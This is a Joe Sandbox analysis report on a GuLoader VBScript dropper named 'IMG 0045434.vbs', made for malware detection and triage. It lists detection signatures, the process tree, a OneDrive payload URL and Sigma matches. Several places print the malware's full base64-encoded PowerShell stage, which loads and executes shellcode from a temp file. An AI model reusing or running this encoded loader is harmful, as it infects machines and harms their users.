Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
IMG 0045434.vbs

Overview

General Information

Sample Name:IMG 0045434.vbs
Analysis ID:562140
MD5:813117cdcd80979365fd6d9586d11e4a
SHA1:e28ef2705053405e87f440f078f31d13b09a9ee3
SHA256:1def093ef16309c10c38b5426ac396019c4ddc074394b022626b8dce1ea2acaa
Tags:vbs
Infos:

Detection

GuLoader
Score:88
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Found malware configuration
VBScript performs obfuscated calls to suspicious functions
Yara detected GuLoader
Wscript starts Powershell (via cmd or directly)
Potential malicious VBS script found (suspicious strings)
Potential malicious VBS script found (has network functionality)
Encrypted powershell cmdline option found
Very long command line found
C2 URLs / IPs found in malware configuration
Queries the volume information (name, serial number etc) of a device
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
May sleep (evasive loops) to hinder dynamic analysis
Uses code obfuscation techniques (call, push, ret)
Detected potential crypto function
Found dropped PE file which has not been started or loaded
Contains long sleeps (>= 3 min)
Abnormal high CPU Usage
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Java / VBScript file with very long strings (likely obfuscated code)
Drops PE files
Sigma detected: Suspicious Csc.exe Source File Folder
Monitors certain registry keys / values for changes (often done to protect autostart functionality)
Compiles C# or VB.Net code
Sigma detected: Suspicious Execution of Powershell with Base64
Creates a process in suspended mode (likely to inject code)
Found WSH timer for Javascript or VBS script (likely evasive script)

Classification

Process Tree

  • System is w10x64
  • wscript.exe (PID: 6892 cmdline: C:\Windows\System32\wscript.exe "C:\Users\user\Desktop\IMG 0045434.vbs" MD5: 9A68ADD12EB50DDE7586782C3EB9FF9C)
    • powershell.exe (PID: 5612 cmdline: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "IwBiAHIAaQBjAGsAIABMAGkAbABsAGkAdABoACAAUABvAHMAdAA4ACAAVABhAGMAdABpAGwAZQBzAGkAIABSAEEARABJAEMAVQAgAFAAYQByAHIAYQBmAG8AdQByAGEAIABTAGUAcgB2AGIAagBlAHIANAAgAEIAdQB0AHQAdwBvADgAIABnAGgAZQBuAHQAIABPAE0AUwBLACAAUwBvAG4AZwBpAHMAaABtAGkAMwAgAEMAVQBQAFAARQBSAFMARABFAFgAIABTAHIAZwBlADkAIABJAG4AZwBuAHUAMQAgAEsAYQBuAGQAZQBsAGEAYgByADMAIABTAGEAcgBvAG4AaQBjACAATQBJAEsARQBZAE4ATwBUAEgAIABOAEkAVABSAEUAUgBJAE4AIABUAEEAQwBLACAAUABJAEcAUABFAE4AQgAgAEIAZQB0AGEAcABhAHIAdAA1ACAAZwBlAG4AaQBvAGgAIABVAGcAZQBzAGsAcgBpAGYAIABCAGUAcwBsAGEAZwBzAG0ANwAgAE4AbwBuAHAAcwB5AGMAaAA5ACAAcwBlAG4AcwBpAHQAaQB6ACAADQAKAA0ACgANAAoAQQBkAGQALQBUAHkAcABlACAALQBUAHkAcABlAEQAZQBmAGkAbgBpAHQAaQBvAG4AIABAACIADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtADsADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtAC4AUgB1AG4AdABpAG0AZQAuAEkAbgB0AGUAcgBvAHAAUwBlAHIAdgBpAGMAZQBzADsADQAKAHAAdQBiAGwAaQBjACAAcwB0AGEAdABpAGMAIABjAGwAYQBzAHMAIABTAGwAdQBkAHIAZQBjAGgAMQANAAoAewANAAoAWwBEAGwAbABJAG0AcABvAHIAdAAoACIAbgB0AGQAbABsAC4AZABsAGwAIgApAF0AcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAGUAeAB0AGUAcgBuACAAaQBuAHQAIABOAHQAQQBsAGwAbwBjAGEAdABlAFYAaQByAHQAdQBhAGwATQBlAG0AbwByAHkAKABpAG4AdAAgAFMAbAB1AGQAcgBlAGMAaAA2ACwAcgBlAGYAIABJAG4AdAAzADIAIABWAEUAUgBTAEEATABFAFIATgAsAGkAbgB0ACAARgBvAHIAYgBpAHMAdAByAGkAbgAsAHIAZQBmACAASQBuAHQAMwAyACAAUwBsAHUAZAByAGUAYwBoACwAaQBuAHQAIABSAGUAZgByAG0AYQBuACwAaQBuAHQAIABTAGwAdQBkAHIAZQBjAGgANwApADsADQAKAFsARABsAGwASQBtAHAAbwByAHQAKAAiAGsAZQByAG4AZQBsADMAMgAuAGQAbABsACIAKQBdAHAAdQBiAGwAaQBjACAAcwB0AGEAdABpAGMAIABlAHgAdABlAHIAbgAgAEkAbgB0AFAAdAByACAAQwByAGUAYQB0AGUARgBpAGwAZQBBACgAcwB0AHIAaQBuAGcAIABNAG8AbgBzAHQAcgAsAHUAaQBuAHQAIABNAGUAbABsAGUAOAAsAGkAbgB0ACAATgBvAG4AcABlAHIAYwBlAHAALABpAG4AdAAgAFMAbAB1AGQAcgBlAGMAaAAwACwAaQBuAHQAIABIAEEAQgBBAE4ALABpAG4AdAAgAEIAQQBBAE4ALABpAG4AdAAgAE4AUgBJAE4ARwBTACkAOwANAAoAWwBEAGwAbABJAG0AcABvAHIAdAAoACIAawBlAHIAbgBlAGwAMwAyAC4AZABsAGwAIgApAF0AcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAGUAeAB0AGUAcgBuACAAaQBuAHQAIABSAGUAYQBkAEYAaQBsAGUAKABpAG4AdAAgAEYAbwByAGIAaQBzAHQAcgBpAG4AMAAsAHUAaQBuAHQAIABGAG8AcgBiAGkAcwB0AHIAaQBuADEALABJAG4AdABQAHQAcgAgAEYAbwByAGIAaQBzAHQAcgBpAG4AMgAsAHIAZQBmACAASQBuAHQAMwAyACAARgBvAHIAYgBpAHMAdAByAGkAbgAzACwAaQBuAHQAIABGAG8AcgBiAGkAcwB0AHIAaQBuADQAKQA7AA0ACgBbAEQAbABsAEkAbQBwAG8AcgB0ACgAIgB1AHMAZQByADMAMgAuAGQAbABsACIAKQBdAHAAdQBiAGwAaQBjACAAcwB0AGEAdABpAGMAIABlAHgAdABlAHIAbgAgAEkAbgB0AFAAdAByACAAQwBhAGwAbABXAGkAbgBkAG8AdwBQAHIAbwBjAFcAKABJAG4AdABQAHQAcgAgAEYAbwByAGIAaQBzAHQAcgBpAG4ANQAsAGkAbgB0ACAARgBvAHIAYgBpAHMAdAByAGkAbgA2ACwAaQBuAHQAIABGAG8AcgBiAGkAcwB0AHIAaQBuADcALABpAG4AdAAgAEYAbwByAGIAaQBzAHQAcgBpAG4AOAAsAGkAbgB0ACAARgBvAHIAYgBpAHMAdAByAGkAbgA5ACkAOwANAAoAfQANAAoAIgBAAA0ACgAjAGMAaQBzAHQAZQByAGMAaQAgAHAAdQBuAGsAdABlAHIAIABUAGUAbQB1ADQAIABQAEEAVABSAE8ATgBFAFMAIABIAGUAcwB0AGUAawAgAFUATgBSAEUARgBPACAAYgBlAGsAcgBhAG4AcwAgAFAAYQBtAHAAcgAgAEcAZQBuAGIAcgB1ACAAZABlAGMAZQByACAAQwByAGUAcwBjAGUAbgB0ACAAVABoAGkAYQBzAHUAcwBpACAAcABpAGwAdABzAHQAIABPAG0AcwBvAHIAZwBzAGMAZQAgAFAAcgBlAGwANgAgAGIAYQByAHMAawBhAGIAZQBzAG4AIABNAGUAdABhAHQAaABlACAAVABlAGwAZQB2AHMAbgBlAHQAcwA2ACAAUwBtAGEAbABzADcAIABCAE8ATwBTAFQARQBSAEkAIABtAGkAcwBtACAAUABJAE4AUwAgAFQAbgBkAGUAaAB2AGwAMQAgAHMAawByAGkAdgAgAE8AdgBlAHIAIAB1AG4AcAByAG8AcABhAGcAIAANAAoAVABlAHMAdAAtAFAAYQB0AGgAIAAiAEgAaQBsAGQAMwAiACAADQAKAFQAZQBzAHQALQBQAGEAdABoACAAIgBQAGkAZQByAGkAZAAiACAADQAKACQAUwBsAHUAZAByAGUAYwBoADMAPQAwADsADQAKACQAUwBsAHUAZAByAGUAYwBoADkAPQAxADAANAA4ADUANwA2ADsADQAKACQAUwBsAHUAZAByAGUAYwBoADgAPQBbAFMAbAB1AGQAcgBlAGMAaAAxAF0AOgA6AE4AdABBAGwAbABvAGMAYQB0AGUAVgBpAHIAdAB1AGEAbABNAGUAbQBvAHIAeQAoAC0AMQAsAFsAcgBlAGYAXQAkAFMAbAB1AGQAcgBlAGMAaAAzACwAMAAsAFsAcgBlAGYAXQAkAFMAbAB1AGQAcgBlAGMAaAA5ACwAMQAyADIAOAA4ACwANgA0ACkADQAKACMAcwBvAGcAbgBlACAAcwBhAG4AZwAgAE4AWQBUAFYAQQBOAEMAIABSAGkAbABsAGUAdABwAHIAbwA4ACAAcABvAHAAdQBsAGEAcgAgAGIAaQBsAGwAZQBkAG0AIABsAHMAZQBwAHIAbwBjACAAYwBvAG4AcwB0AGEAbgAgAFMAdQBiAHQAZQAgAEkAbABzAGEAYgBlAHQAOQAgAGgAdQBsAGsAeQBuAGEAcAAgAGIAZQB2AHIAdABlAHIAZQBuACAAUwBpAGQAZQB2AGkAIABNAGEAcwB0ACAARQBuAHMAbwBtADEAIABVAG4AZABlAHIAcwBjAGEAbABlADEAIABUAHIAeQBrAGsAZQByAGkAbAAgAEkAZABvAGwAaQBzAGUAcgBpADEAIAByAGUAZAB1ACAAdQBuAGQAdgBpAGcAZQBtAGEAbgAgAEQAZQBmAGUAIABLAE4ATwBDAEsATwBVACAAUwBsAHYAZQBzAHQAZQBzACAATgBvAG4AYgBlACAAUgBlAGEAcgBiAGkAdAByAGEAdAAgAGMAbwByAGIAZQBpAGwAcwBkAG8AIABzAGEAbgBkAHMAeQBuAGwAaQAgAA0ACgBUAGUAcwB0AC0AUABhAHQAaAAgACIAcwBlAGsAcgBlAHQAZQByACIAIAANAAoAJABTAGwAdQBkAHIAZQBjAGgAMgA9ACIAJABlAG4AdgA6AHQAZQBtAHAAIgAgACsAIAAiAFwAVABSAEkAQwBBAC4AZABhAHQAIgANAAoAIwBlAGYAdABlAHIAIABEAHUAcABwAGUAdABmAG8AcgA1ACAAQwBhAHIAZgB1ADEAIABzAHUAcgBlAG4AZQAgAEEARgBTAEkARwAgAGEAcgBpAGsAYQByAGEAcABlAHIAIABQAEkARwBFAE8ATgBIAE8ATABFACAASABvAHYAZQBsAGUAIABTAG0AZQBsAHQAZQAgAG0AZQBsAGUAbgBhACAAVQB0AGEAawAzACAARwBMAE8AUgBJAEUATgBTACAAQwBvAG4AYwBpAG8ANQAgAA0ACgAkAFMAbAB1AGQAcgBlAGMAaAA0AD0AWwBTAGwAdQBkAHIAZQBjAGgAMQBdADoAOgBDAHIAZQBhAHQAZQBGAGkAbABlAEEAKAAkAFMAbAB1AGQAcgBlAGMAaAAyACwAMgAxADQANwA0ADgAMwA2ADQAOAAsADEALAAwACwAMwAsADEAMgA4ACwAMAApAA0ACgAjAEIAdQBtAGIAZQByAHMAaABvAG8AIABVAG4AZgBsADMAIABVAG4AcwBhAGMAcgBhADUAIABPAHAAaAB0AGgAYQBsACAAQgByAGEAdAB0AGkAbgAyACAAUABZAFQASABPACAASABlAHIAbQBlAGQAcAA4ACAATAByAGUAcgAyACAAdgBhAHIAcAAgAFEAdQBhAGQAdwBvACAATwB2AGUAcgB0AGgAcgBvADIAIABBAHIAbQBlAG4AaQBhAGEAcgByADMAIABIAGEAbAB2ADQAIABDAHIAdQBuAGsAbABlAHAAZQBuADQAIAByAGUAcwBwAGkAcgAgAFMATQBVAEsASwBFAFMAVABJAFYAIAANAAoAVABlAHMAdAAtAFAAYQB0AGgAIAAiAEMAYQByAGMAaABhAHIAbwAiACAADQAKACQAUwBsAHUAZAByAGUAYwBoADUAPQAwADsADQAKACMAUABhAHIAcwA5ACAAUwBVAFAAUABPAFIAVABBACAARABKAEEARQBWAEUATABTAEsAQwAgAFAAUgBPAEMARQBSAEUATQBPACAATABvAHIAaQBjAGEAZQBwAHIAZQAgAGcAdQByAHIAcwAgAGQAZQBnAHIAYQAgAGwAaQB0AHUAcgBnAGkAZQBzACAAUABBAEEAVABBAEcARQAgAFUAbgByAGUAcAB1AGwAcwAgAFUAbgBhAGMAYwBlAHAAdABhACAASwBlAGwAbAA3ACAAVwBhAGcAZwBsAGUAcwB1AGQAZwAgAE0AZQBnAGEAbABvAHIAbgBpAHQAIABjAG8AbQBwAHUAIABCAFUARABTACAAQgByAG8AbwBkAHkAYQBzAHQAcgAgAA0ACgBUAGUAcwB0AC0AUABhAHQAaAAgACIATwB2AGUAcgB0AHIAYQBtAHAAbAAiACAADQAKAFsAUwBsAHUAZAByAGUAYwBoADEAXQA6ADoAUgBlAGEAZABGAGkAbABlACgAJABTAGwAdQBkAHIAZQBjAGgANAAsACQAUwBsAHUAZAByAGUAYwBoADMALAA1ADQANwAzADEALABbAHIAZQBmAF0AJABTAGwAdQBkAHIAZQBjAGgANQAsADAAKQANAAoAIwBNAHUAcwBpAGMAcgB5AGIAdQAgAEQATwBLAFUATQAgAEIARQBTAEsAIABjAG8AYQBnAHUAbABvAG0AIABuAG8AbgBzAHkAcwB0AGUAIABQAFIARQBDAEUAUgBUAEkARgAgAFMAYQBiAGIAYQB0AGEAIABwAHUAbgBkAGsAdQByACAAQwBoAGwAbwAgAEwAbwBlAHMAZQAyACAASABhAHYAbgBlAGYAbwAzACAATQBlAHQAYQAxACAAaQBzAGIAYQBhAGQAcwBoAGEAIABUAHIAYQBjAGgAeQBjAGEAIABIAEUAUgBSAEUARwAgAEwAQQBOAEQAIAANAAoAVABlAHMAdAAtAFAAYQB0AGgAIAAiAFoAZQBhAGwAOQAiACAADQAKAFQAZQBzAHQALQBQAGEAdABoACAAIgBLAGEAbABrAHYAcgBrADQAIgAgAA0ACgBUAGUAcwB0AC0AUABhAHQAaAAgACIAbABlAHYAZQBmAG8AZABlAG4AZAAiACAADQAKAFQAZQBzAHQALQBQAGEAdABoACAAIgBTAHQAcgBiAGUANAAiACAADQAKAFQAZQBzAHQALQBQAGEAdABoACAAIgBMAEkATgBFAE4ARABFAFMASwAiACAADQAKAFQAZQBzAHQALQBQAGEAdABoACAAIgBTAHAAZQBhAGsAZQBhAHMAeQBjADgAIgAgAA0ACgBUAGUAcwB0AC0AUABhAHQAaAAgACIATQBVAFMASwBVACIAIAANAAoAVABlAHMAdAAtAFAAYQB0AGgAIAAiAEIAcgBhAG4AZABzAGwAdQAiACAADQAKAFQAZQBzAHQALQBQAGEAdABoACAAIgBBAGQAZABpAGIAbABlAGQAZQBzACIAIAANAAoAVABlAHMAdAAtAFAAYQB0AGgAIAAiAFAAaABvAGIAIgAgAA0ACgBUAGUAcwB0AC0AUABhAHQAaAAgACIATgBpAGcAaAB0AHcAMwAiACAADQAKAFQAZQBzAHQALQBQAGEAdABoACAAIgBUAGoAZQBuAGUAcwB0AGUAIgAgAA0ACgBUAGUAcwB0AC0AUABhAHQAaAAgACIASABpAGcAaAB3AGEAeQBtAGEAIgAgAA0ACgBUAGUAcwB0AC0AUABhAHQAaAAgACIATwBwAGQAYQB0AGUAcgBpACIAIAANAAoAWwBTAGwAdQBkAHIAZQBjAGgAMQBdADoAOgBDAGEAbABsAFcAaQBuAGQAbwB3AFAAcgBvAGMAVwAoACQAUwBsAHUAZAByAGUAYwBoADMALAAgADAALAAwACwAMAAsADAAKQANAAoADQAKAA== MD5: DBA3E6449E97D4E3DF64527EF7012A10)
      • conhost.exe (PID: 5576 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
      • csc.exe (PID: 5320 cmdline: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\ridmj1ad\ridmj1ad.cmdline MD5: 350C52F71BDED7B99668585C15D70EEA)
        • cvtres.exe (PID: 5400 cmdline: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RES7F9.tmp" "c:\Users\user\AppData\Local\Temp\ridmj1ad\CSC3DE241659FC44F82A3F695B8E7FD432F.TMP" MD5: C09985AE74F0882F208D75DE27770DFA)
  • cleanup

Malware Configuration

Threatname: GuLoader

{"Payload URL": "https://onedrive.live.com/download?cidO"}

Yara Overview

Memory Dumps

SourceRuleDescriptionAuthorStrings
00000003.00000002.1189973609.00000000098B0000.00000040.00000800.00020000.00000000.sdmpJoeSecurity_GuLoader_2Yara detected GuLoaderJoe Security

    Sigma Overview

    System Summary

    barindex
    Source: Process startedAuthor: Florian Roth: Data: Command: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\ridmj1ad\ridmj1ad.cmdline, CommandLine: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\ridmj1ad\ridmj1ad.cmdline, CommandLine|base64offset|contains: zw, Image: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe, NewProcessName: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe, OriginalFileName: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe, ParentCommandLine: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "IwBiAHIAaQBjAGsAIABMAGkAbABsAGkAdABoACAAUABvAHMAdAA4ACAAVABhAGMAdABpAGwAZQBzAGkAIABSAEEARABJAEMAVQAgAFAAYQByAHIAYQBmAG8AdQByAGEAIABTAGUAcgB2AGIAagBlAHIANAAgAEIAdQB0AHQAdwBvADgAIABnAGgAZQBuAHQAIABPAE0AUwBLACAAUwBvAG4AZwBpAHMAaABtAGkAMwAgAEMAVQBQAFAARQBSAFMARABFAFgAIABTAHIAZwBlADkAIABJAG4AZwBuAHUAMQAgAEsAYQBuAGQAZQBsAGEAYgByADMAIABTAGEAcgBvAG4AaQBjACAATQBJAEsARQBZAE4ATwBUAEgAIABOAEkAVABSAEUAUgBJAE4AIABUAEEAQwBLACAAUABJAEcAUABFAE4AQgAgAEIAZQB0AGEAcABhAHIAdAA1ACAAZwBlAG4AaQBvAGgAIABVAGcAZQBzAGsAcgBpAGYAIABCAGUAcwBsAGEAZwBzAG0ANwAgAE4AbwBuAHAAcwB5AGMAaAA5ACAAcwBlAG4AcwBpAHQAaQB6ACAADQAKAA0ACgANAAoAQQBkAGQALQBUAHkAcABlACAALQBUAHkAcABlAEQAZQBmAGkAbgBpAHQAaQBvAG4AIABAACIADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtADsADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtAC4AUgB1AG4AdABpAG0AZQAuAEkAbgB0AGUAcgBvAHAAUwBlAHIAdgBpAGMAZQBzADsADQAKAHAAdQBiAGwAaQBjACAAcwB0AGEAdABpAGMAIABjAGwAYQBzAHMAIABTAGwAdQBkAHIAZQBjAGgAMQANAAoAewANAAoAWwBEAGwAbABJAG0AcABvAHIAdAAoACIAbgB0AGQAbABsAC4AZABsAGwAIgApAF0AcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAGUAeAB0AGUAcgBuACAAaQBuAHQAIABOAHQAQQBsAGwAbwBjAGEAdABlAFYAaQByAHQAdQBhAGwATQBlAG0AbwByAHkAKABpAG4AdAAgAFMAbAB1AGQAcgBlAGMAaAA2ACwAcgBlAGYAIABJAG4AdAAzADIAIABWAEUAUgBTAEEATABFAFIATgAsAGkAbgB0ACAARgBvAHIAYgBpAHMAdAByAGkAbgAsAHIAZQBmACAASQBuAHQAMwAyACAAUwBsAHUAZAByAGUAYwBoACwAaQBuAHQAIABSAGUAZgByAG0AYQBuACwAaQBuAHQAIABTAGwAdQBkAHIAZQBjAGgANwApADsADQAKAFsARABsAGwASQBtAHAAbwByAHQAKAAiAGsAZQByAG4AZQBsADMAMgAuAGQAbABsACIAKQBdAHAAdQBiAGwAaQBjACAAcwB0AGEAdABpAGMAIABlAHgAdABlAHIAbgAgAEkAbgB0AFAAdAByACAAQwByAGUAYQB0AGUARgBpAGwAZQBBACgAcwB0AHIAaQBuAGcAIABNAG8AbgBzAHQAcgAsAHUAaQBuAHQAIABNAGUAbABsAGUAOAAsAGkAbgB0ACAATgBvAG4AcABlAHIAYwBlAHAALABpAG4AdAAgAFMAbAB1AGQAcgBlAGMAaAAwACwAaQBuAHQAIABIAEEAQgBBAE4ALABpAG4AdAAgAEIAQQBBAE4ALABpAG4AdAAgAE4AUgBJAE4ARwBTACkAOwANAAoAWwBEAGwAbABJAG0AcABvAHIAdAAoACIAawBlAHIAbgBlAGwAMwAyAC4AZABsAGwAIgApAF0AcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAGUAeAB0AGUAcgBuACAAaQBuAHQAIABSAGUAYQBkAEYAaQBsAGUAKABpAG4AdAAgAEYAbwByAGIAaQBzAHQAcgBpAG4AMAAsAHUAaQBuAHQAIABGAG8AcgBiAGkAcwB0AHIAaQBuADEALABJAG4AdABQAHQAcgAgAEYAbwByAGIAaQBzAHQAcgBpAG4AMgAsAHIAZQBmACAASQBuAHQAMwAyACAARgBvAHIAYgBpAHMAdAByAGkAbgAzACwAaQBuAHQAIABGAG8AcgBiAGkAcwB0AHIAaQBuADQAKQA7AA0ACgBbAEQAbABsAEkAbQBwAG8AcgB0ACgAIgB1AHMAZQByADMAMgAuAGQAbABsACIAKQBdAHAAdQBiAGwAaQBjACAAcwB0AGEAdABpAGMAIABlAHgAdABlAHIAbgAgAEkAbgB0AFAAdAByACAAQwBhAGwAbABXAGkAbgBkAG
    Source: Process startedAuthor: frack113: Data: Command: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "IwBiAHIAaQBjAGsAIABMAGkAbABsAGkAdABoACAAUABvAHMAdAA4ACAAVABhAGMAdABpAGwAZQBzAGkAIABSAEEARABJAEMAVQAgAFAAYQByAHIAYQBmAG8AdQByAGEAIABTAGUAcgB2AGIAagBlAHIANAAgAEIAdQB0AHQAdwBvADgAIABnAGgAZQBuAHQAIABPAE0AUwBLACAAUwBvAG4AZwBpAHMAaABtAGkAMwAgAEMAVQBQAFAARQBSAFMARABFAFgAIABTAHIAZwBlADkAIABJAG4AZwBuAHUAMQAgAEsAYQBuAGQAZQBsAGEAYgByADMAIABTAGEAcgBvAG4AaQBjACAATQBJAEsARQBZAE4ATwBUAEgAIABOAEkAVABSAEUAUgBJAE4AIABUAEEAQwBLACAAUABJAEcAUABFAE4AQgAgAEIAZQB0AGEAcABhAHIAdAA1ACAAZwBlAG4AaQBvAGgAIABVAGcAZQBzAGsAcgBpAGYAIABCAGUAcwBsAGEAZwBzAG0ANwAgAE4AbwBuAHAAcwB5AGMAaAA5ACAAcwBlAG4AcwBpAHQAaQB6ACAADQAKAA0ACgANAAoAQQBkAGQALQBUAHkAcABlACAALQBUAHkAcABlAEQAZQBmAGkAbgBpAHQAaQBvAG4AIABAACIADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtADsADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtAC4AUgB1AG4AdABpAG0AZQAuAEkAbgB0AGUAcgBvAHAAUwBlAHIAdgBpAGMAZQBzADsADQAKAHAAdQBiAGwAaQBjACAAcwB0AGEAdABpAGMAIABjAGwAYQBzAHMAIABTAGwAdQBkAHIAZQBjAGgAMQANAAoAewANAAoAWwBEAGwAbABJAG0AcABvAHIAdAAoACIAbgB0AGQAbABsAC4AZABsAGwAIgApAF0AcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAGUAeAB0AGUAcgBuACAAaQBuAHQAIABOAHQAQQBsAGwAbwBjAGEAdABlAFYAaQByAHQAdQBhAGwATQBlAG0AbwByAHkAKABpAG4AdAAgAFMAbAB1AGQAcgBlAGMAaAA2ACwAcgBlAGYAIABJAG4AdAAzADIAIABWAEUAUgBTAEEATABFAFIATgAsAGkAbgB0ACAARgBvAHIAYgBpAHMAdAByAGkAbgAsAHIAZQBmACAASQBuAHQAMwAyACAAUwBsAHUAZAByAGUAYwBoACwAaQBuAHQAIABSAGUAZgByAG0AYQBuACwAaQBuAHQAIABTAGwAdQBkAHIAZQBjAGgANwApADsADQAKAFsARABsAGwASQBtAHAAbwByAHQAKAAiAGsAZQByAG4AZQBsADMAMgAuAGQAbABsACIAKQBdAHAAdQBiAGwAaQBjACAAcwB0AGEAdABpAGMAIABlAHgAdABlAHIAbgAgAEkAbgB0AFAAdAByACAAQwByAGUAYQB0AGUARgBpAGwAZQBBACgAcwB0AHIAaQBuAGcAIABNAG8AbgBzAHQAcgAsAHUAaQBuAHQAIABNAGUAbABsAGUAOAAsAGkAbgB0ACAATgBvAG4AcABlAHIAYwBlAHAALABpAG4AdAAgAFMAbAB1AGQAcgBlAGMAaAAwACwAaQBuAHQAIABIAEEAQgBBAE4ALABpAG4AdAAgAEIAQQBBAE4ALABpAG4AdAAgAE4AUgBJAE4ARwBTACkAOwANAAoAWwBEAGwAbABJAG0AcABvAHIAdAAoACIAawBlAHIAbgBlAGwAMwAyAC4AZABsAGwAIgApAF0AcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAGUAeAB0AGUAcgBuACAAaQBuAHQAIABSAGUAYQBkAEYAaQBsAGUAKABpAG4AdAAgAEYAbwByAGIAaQBzAHQAcgBpAG4AMAAsAHUAaQBuAHQAIABGAG8AcgBiAGkAcwB0AHIAaQBuADEALABJAG4AdABQAHQAcgAgAEYAbwByAGIAaQBzAHQAcgBpAG4AMgAsAHIAZQBmACAASQBuAHQAMwAyACAARgBvAHIAYgBpAHMAdAByAGkAbgAzACwAaQBuAHQAIABGAG8AcgBiAGkAcwB0AHIAaQBuADQAKQA7AA0ACgBbAEQAbABsAEkAbQBwAG8AcgB0ACgAIgB1AHMAZQByADMAMgAuAGQAbABsACIAKQBdAHAAdQBiAGwAaQBjACAAcwB0AGEAdABpAGMAIABlAHgAdABlAHIAbgAgAEkAbgB0AFAAdAByACAAQwBhAGwAbABXAGkAbgBkAG8AdwBQAHIAbwBjAFcAKABJAG4AdABQAHQAcgAgAEYAbwByAGIAaQBzAHQAcgBpAG4ANQAsAGkAbgB0ACAARgBvAHIAYgBpAHMAdAByAGkAbgA2ACwAaQBuAHQAIABGAG8AcgBiAGkAcwB0AHIAaQBuADcALABpAG4AdAAgAEYAbwByAGIAaQBzAHQAcgBpAG4AOAAsAGkAbgB0ACAARgBvAHIAYgBpAHMAdAByAGkAbgA5ACkAOwANAAoAfQANAAoAIgBAAA0ACgAjAGMAaQBzAHQAZQByAGMAaQAgAHAAdQBuAGsAdABlAHIAIABUAGUAbQB1ADQAIABQAEEAVABSAE8ATgBFAFMAIABIAGUAcwB0AGUAawAgAFUATgBSAEUARgBPACAAYgBlAGsAcgBhAG4AcwAgAFAAYQBtAHAAcgAgAEcAZQBuAGIAcgB1ACAAZABlAGMAZQByACAAQwByAGUAcwBjAGUAbgB0ACAAVABoAGkAYQBzAHUAcwBpACAAcABpAGwAdABzAHQAIABPAG0AcwBvAHIAZwBzAGMAZQAgA
    Source: File createdAuthor: frack113: Data: EventID: 11, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ProcessId: 5612, TargetFilename: C:\Users\user\AppData\Local\Temp\ridmj1ad\ridmj1ad.cmdline
    Source: Process startedAuthor: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "IwBiAHIAaQBjAGsAIABMAGkAbABsAGkAdABoACAAUABvAHMAdAA4ACAAVABhAGMAdABpAGwAZQBzAGkAIABSAEEARABJAEMAVQAgAFAAYQByAHIAYQBmAG8AdQByAGEAIABTAGUAcgB2AGIAagBlAHIANAAgAEIAdQB0AHQAdwBvADgAIABnAGgAZQBuAHQAIABPAE0AUwBLACAAUwBvAG4AZwBpAHMAaABtAGkAMwAgAEMAVQBQAFAARQBSAFMARABFAFgAIABTAHIAZwBlADkAIABJAG4AZwBuAHUAMQAgAEsAYQBuAGQAZQBsAGEAYgByADMAIABTAGEAcgBvAG4AaQBjACAATQBJAEsARQBZAE4ATwBUAEgAIABOAEkAVABSAEUAUgBJAE4AIABUAEEAQwBLACAAUABJAEcAUABFAE4AQgAgAEIAZQB0AGEAcABhAHIAdAA1ACAAZwBlAG4AaQBvAGgAIABVAGcAZQBzAGsAcgBpAGYAIABCAGUAcwBsAGEAZwBzAG0ANwAgAE4AbwBuAHAAcwB5AGMAaAA5ACAAcwBlAG4AcwBpAHQAaQB6ACAADQAKAA0ACgANAAoAQQBkAGQALQBUAHkAcABlACAALQBUAHkAcABlAEQAZQBmAGkAbgBpAHQAaQBvAG4AIABAACIADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtADsADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtAC4AUgB1AG4AdABpAG0AZQAuAEkAbgB0AGUAcgBvAHAAUwBlAHIAdgBpAGMAZQBzADsADQAKAHAAdQBiAGwAaQBjACAAcwB0AGEAdABpAGMAIABjAGwAYQBzAHMAIABTAGwAdQBkAHIAZQBjAGgAMQANAAoAewANAAoAWwBEAGwAbABJAG0AcABvAHIAdAAoACIAbgB0AGQAbABsAC4AZABsAGwAIgApAF0AcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAGUAeAB0AGUAcgBuACAAaQBuAHQAIABOAHQAQQBsAGwAbwBjAGEAdABlAFYAaQByAHQAdQBhAGwATQBlAG0AbwByAHkAKABpAG4AdAAgAFMAbAB1AGQAcgBlAGMAaAA2ACwAcgBlA